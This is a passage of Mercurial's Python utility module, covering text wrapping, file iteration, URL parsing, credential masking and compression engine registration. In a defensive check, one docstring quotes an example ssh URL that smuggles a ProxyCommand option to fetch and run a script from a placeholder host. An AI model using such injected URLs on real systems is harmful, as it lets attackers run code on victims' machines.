    The wrapper class is defined on the first call only: the function then
    rebinds the module-level name MBTextWrapper to that class, so later
    calls instantiate the class directly.
    """
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires user decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # Split ucstr in two: the longest prefix whose accumulated
            # column width fits in space_left, and the remainder.
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            # Always leave room for at least one column on the line.
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                # Put as much of the long chunk as fits on this line and
                # leave the rest on the stack for the next line.
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                # Not allowed to break the word: give it a line of its own.
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chunks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    # Replace this factory function with the class itself so the class
    # body is only evaluated once.
    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2436 2435
def wrap(line, width, initindent='', hangindent=''):
    """Wrap line to width columns and return the filled text.

    initindent prefixes the first output line and hangindent the following
    ones. All three strings are decoded from the local encoding before
    wrapping, and the result is encoded back.
    """
    widest = max(len(hangindent), len(initindent))
    if width <= widest:
        # adjust for weird terminal size
        width = max(78, widest + 1)
    codec = pycompat.sysstr(encoding.encoding)
    errmode = pycompat.sysstr(encoding.encodingmode)
    line = line.decode(codec, errmode)
    initindent = initindent.decode(codec, errmode)
    hangindent = hangindent.decode(codec, errmode)
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    filled = wrapper.fill(line)
    return filled.encode(codec)
2452 2451
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            """Iterate over the lines of fp by calling fp.readline() until
            it returns an empty string."""
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            """Yield the lines of fp, reading its file descriptor directly
            with os.read() in chunks of bufsize and retrying on EINTR."""
            fd = fp.fileno()
            # data read so far that does not yet end in a newline
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    # keepends=True so complete lines can be told apart
                    # from a trailing partial one
                    splitted = line.splitlines(True)
                    line = ''
                    # NOTE(review): splitlines() also splits on a lone
                    # '\r'; such a piece does not end in '\n' and looks
                    # like it would be overwritten by a later partial
                    # piece - confirm whether that input can occur.
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    # empty read: end of file
                    break
            if line:
                # final line without a trailing newline
                yield line

    def iterfile(fp):
        """Return an iterable over the lines of fp.

        fp itself is returned unless it is exactly of type file and is not
        a regular file (S_ISREG); in that case the EINTR-safe iterator is
        returned instead.
        """
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        """Return fp unchanged; it is iterated directly."""
        return fp
2524 2523
def iterlines(iterator):
    """Yield every line of every chunk produced by iterator.

    Each chunk is split with splitlines(), so line terminators are not
    included in the yielded lines.
    """
    for piece in iterator:
        pending = piece.splitlines()
        for entry in pending:
            yield entry
2529 2528
def expandpath(path):
    """Return path with environment variables expanded first and a
    leading '~' user directory expanded afterwards."""
    withvars = os.path.expandvars(path)
    return os.path.expanduser(withvars)
2532 2531
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if not mainfrozen():
        return gethgcmd()
    if getattr(sys, 'frozen', None) != 'macosx_app':
        return [pycompat.sysexecutable]
    # Env variable set by py2app
    return [encoding.environ['EXECUTABLEPATH']]
2547 2546
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # os.wait() returns a (pid, status) pair; store only the pid so
        # that the "pid in terminated" test below can actually succeed.
        terminated.add(os.wait()[0])
    prevhandler = None
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # condfn() is checked a second time so a child that satisfied
            # the condition just before exiting is not reported as failed.
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # prevhandler stays None when SIGCHLD is unavailable or when
        # signal.signal() reported no Python-level previous handler; there
        # is nothing to restore in either case.
        if prevhandler is not None:
            signal.signal(SIGCHLD, prevhandler)
2582 2581
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    mapping maps names (used verbatim as regular expression alternatives)
    to their replacement text. It is never modified.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            # drop the regex-escaping backslash to get the literal char
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        # Add the prefix -> prefix entry to a private copy so the caller's
        # mapping is left untouched.
        mapping = dict(mapping)
        mapping[prefix_char] = prefix_char
    r = remod.compile(r'%s(%s)' % (prefix, patterns))
    # x.group() is the prefix character followed by the matched name
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2607 2606
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        number = int(port)
    except ValueError:
        # not a number: treat it as a service name below
        number = None
    if number is not None:
        return number

    try:
        return socket.getservbyname(port)
    except socket.error:
        raise Abort(_("no port number associated with service '%s'") % port)
2624 2623
# Lower-case spellings recognised by parsebool().
_booleans = {
    '1': True,
    'yes': True,
    'true': True,
    'on': True,
    'always': True,
    '0': False,
    'no': False,
    'false': False,
    'off': False,
    'never': False,
}

def parsebool(s):
    """Parse s into a boolean.

    The comparison is case-insensitive. If s is not a valid boolean,
    returns None.
    """
    key = s.lower()
    return _booleans.get(key)
2635 2634
# Lookup table from every two-character hex string (each character taken
# from string.hexdigits, so both upper and lower case) to the character
# with that code.
_hextochr = dict((a + b, chr(int(a + b, 16)))
                 for a in string.hexdigits for b in string.hexdigits)
2638 2637
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url('http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url('ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url('file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url('file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url('bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url('bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(r'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(r'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(r'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(r'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url('ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url('ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url('http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url('')
    <url path: ''>
    >>> url('#a')
    <url path: '', fragment: 'a'>
    >>> url('http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url('http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url('http:')
    <url scheme: 'http'>
    """

    # characters left unquoted in the user and passwd components
    _safechars = "!~*'()+"
    # characters left unquoted in the path and fragment components
    _safepchars = "/!~*'()+:\\"
    # matches a leading "<scheme>:" made of letters, digits, '+', '.', '-'
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        """Parse path into its URL components.

        Raises Abort for a file:// URL naming a host other than
        'localhost', '127.0.0.1' or '[::1]'.
        """
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        # stays True unless a scheme is parsed below
        self._localpath = True
        # the "host:port" text as it was before being split, if any
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                # split on the last '@' so that credentials containing
                # '@' stay on the user side
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    def __repr__(self):
        """Return '<url ...>' listing every component that is not None."""
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> str(url('http://localhost:80//'))
        'http://localhost:80//'
        >>> str(url('http://localhost:80/'))
        'http://localhost:80/'
        >>> str(url('http://localhost:80'))
        'http://localhost:80/'
        >>> str(url('bundle:foo'))
        'bundle:foo'
        >>> str(url('bundle://../foo'))
        'bundle:../foo'
        >>> str(url('path'))
        'path'
        >>> str(url('file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> str(url('file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print url(r'bundle:foo\bar')
        bundle:foo\bar
        >>> print url(r'file:///D:\data\hg')
        file:///D:\data\hg
        """
        if self._localpath:
            # local paths are emitted without any quoting
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            # a bracketed (IPv6) host is emitted verbatim
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        """Return (url-without-credentials, authinfo).

        authinfo is None when there is no user; otherwise it is the tuple
        (None, (url, host), user, passwd-or-'').
        """
        user, passwd = self.user, self.passwd
        try:
            # temporarily clear the credentials so they are left out of
            # the rendered string
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        """Return True when this URL is remote or its path is absolute."""
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        """Return the filesystem path for file and bundle URLs, and the
        original string passed to the constructor for anything else."""
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')
2941 2940
def hasscheme(path):
    """Return True when parsing path as a url yields a non-empty scheme."""
    parsed = url(path)
    return bool(parsed.scheme)
2944 2943
def hasdriveletter(path):
    """Tell whether path starts with a drive letter such as 'c:'.

    A falsy path (None or an empty string) is returned unchanged;
    otherwise the result is True or False.
    """
    if not path:
        return path
    if path[1:2] != ':':
        return False
    return path[0:1].isalpha()
2947 2946
def urllocalpath(path):
    """Return the local path for path, parsed as a url with query and
    fragment parsing disabled."""
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
2950 2949
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    # inspect the unquoted form so an escaped leading dash is caught too
    path = urlreq.unquote(path)
    unsafe = path.startswith(('ssh://-', 'svn+ssh://-'))
    if unsafe:
        raise error.Abort(_('potentially unsafe url: %r') %
                          (path,))
2965 2964
def hidepassword(u):
    '''hide user credential in a url string

    A non-empty password is replaced by '***'; the url is otherwise
    rendered unchanged.
    '''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = '***'
    masked = bytes(parsed)
    return masked
2972 2971
def removeauth(u):
    '''remove all authentication information from a url string

    The user and password components are dropped and the url is rendered
    back to a byte string.
    '''
    u = url(u)
    u.user = u.passwd = None
    # Render with bytes() like hidepassword() does, so both helpers return
    # the same string type (str() would give a unicode string on Python 3).
    return bytes(u)
2978 2977
# Render a duration given in seconds as a human-readable string. Each row
# is a (multiplier, divisor, format) triple consumed by unitcountfn(): rows
# are tried top to bottom and the first one with abs(count) >=
# multiplier * divisor formats count / divisor.
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )
2994 2993
# Current indentation (in columns) of the timing report; kept in a
# one-element list so the nested wrapper can update it in place.
_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass

    Reports of nested timed calls are indented by two columns per level.
    '''

    def wrapper(*args, **kwargs):
        began = timer()
        step = 2
        _timenesting[0] += step
        try:
            return func(*args, **kwargs)
        finally:
            duration = timer() - began
            _timenesting[0] -= step
            padding = ' ' * _timenesting[0]
            stderr.write('%s%s: %s\n' %
                         (padding, func.__name__, timecount(duration)))
    return wrapper
3021 3020
# (suffix, factor) pairs, tried in this order by sizetoint().
_sizeunits = (
    ('m', 2**20),
    ('k', 2**10),
    ('g', 2**30),
    ('kb', 2**10),
    ('mb', 2**20),
    ('gb', 2**30),
    ('b', 1),
)

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    The specifier is a number optionally followed by a case-insensitive
    unit suffix. Raises error.ParseError when it cannot be parsed.

    >>> sizetoint('30')
    30
    >>> sizetoint('2.2kb')
    2252
    >>> sizetoint('6M')
    6291456
    '''
    spec = s.strip().lower()
    try:
        for suffix, factor in _sizeunits:
            if not spec.endswith(suffix):
                continue
            number = float(spec[:-len(suffix)])
            return int(number * factor)
        return int(spec)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3043 3042
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # list of (source, hook) pairs
        self._hooks = []

    def add(self, source, hook):
        '''Register hook under the given source name.'''
        entry = (source, hook)
        self._hooks.append(entry)

    def __call__(self, *args):
        '''Call every hook with args and return the list of results.'''
        # sort in place by source name before running
        self._hooks.sort(key=lambda pair: pair[0])
        return [hook(*args) for source, hook in self._hooks]
3061 3060
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries
    (a depth of 0 keeps every remaining entry).
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not be used in production code but very convenient while developing.
    '''
    # The extra -1 drops this generator's own frame from the stack.
    stack = traceback.extract_stack()[:-skip - 1]
    located = [(fileline % (fn, ln), func) for fn, ln, func, _text in stack]
    entries = located[-depth:]
    if not entries:
        return

    # Width of the widest "file:line" label, used to align the output.
    fnmax = max(len(where) for where, _func in entries)
    if line is None:
        for fnln, func in entries:
            yield (fnmax, fnln, func)
    else:
        for fnln, func in entries:
            yield line % (fnmax, fnln, func)
3084 3083
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    # Flush the other stream first so its pending output is not interleaved
    # with the trace.
    if otherf:
        otherf.flush()

    header = '%s at:\n' % msg.rstrip()
    f.write(header)
    # skip + 1 also hides this function's own frame from the report.
    frames = getstackframes(skip + 1, depth=depth)
    for frameline in frames:
        f.write(frameline)
    f.flush()
3099 3098
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest

    Each directory that is an ancestor of an added path is stored with a
    reference count in ``self._dirs``.
    '''

    def __init__(self, map, skip=None):
        '''Populate the multiset from the paths in ``map``.

        When ``map`` has an ``iteritems`` method and ``skip`` is given,
        entries whose value starts with ``skip`` (``value[0] == skip``) are
        left out. Otherwise every item yielded by iterating ``map`` is added.
        '''
        self._dirs = {}
        if safehasattr(map, 'iteritems') and skip is not None:
            paths = (f for f, s in map.iteritems() if s[0] != skip)
        else:
            paths = map

        register = self.addpath
        for path in paths:
            register(path)

    def addpath(self, path):
        '''Count one more reference for each ancestor directory of path.'''
        counts = self._dirs
        for parent in finddirs(path):
            if parent not in counts:
                counts[parent] = 1
                continue
            # Directory already known: bump it and stop. The remaining
            # (shorter) ancestors are left untouched.
            counts[parent] += 1
            return

    def delpath(self, path):
        '''Drop one reference from the ancestor directories of path.'''
        counts = self._dirs
        for parent in finddirs(path):
            if counts[parent] <= 1:
                # Last reference: forget the directory and keep walking up.
                del counts[parent]
                continue
            counts[parent] -= 1
            return

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

# Prefer the implementation from the parsers module when it provides one.
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3138 3137
def finddirs(path):
    '''Yield each ancestor directory of path, longest first.

    The path is cut at every '/' from right to left; a path without any
    '/' yields nothing.
    '''
    cut = path.rfind('/')
    while True:
        if cut == -1:
            return
        yield path[:cut]
        # Continue the search strictly to the left of the last separator.
        cut = path.rfind('/', 0, cut)
3144 3143
3145 3144 # compression code
3146 3145
# Roles accepted by compressormanager.supportedwireengines().
SERVERROLE = 'server'
CLIENTROLE = 'client'

# Return type of compressionengine.wireprotosupport().
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        # Engine name to engine instance.
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.

        Raises ``ValueError`` if ``engine`` is not a ``compressionengine``
        and ``error.Abort`` if its name, bundle name, bundle type, wire
        protocol identifier or revlog header is already taken.

        Registration is all-or-nothing: every identifier is checked before
        any lookup table is modified, so a rejected engine leaves the
        manager unchanged.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        # Phase 1: collect the engine's identifiers and validate all of
        # them. Nothing is written to the manager in this phase.
        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        # Phase 2: everything checked out, record the engine.
        if bundleinfo:
            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        if wiresupport:
            self._wiretypes[wiretype] = name

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
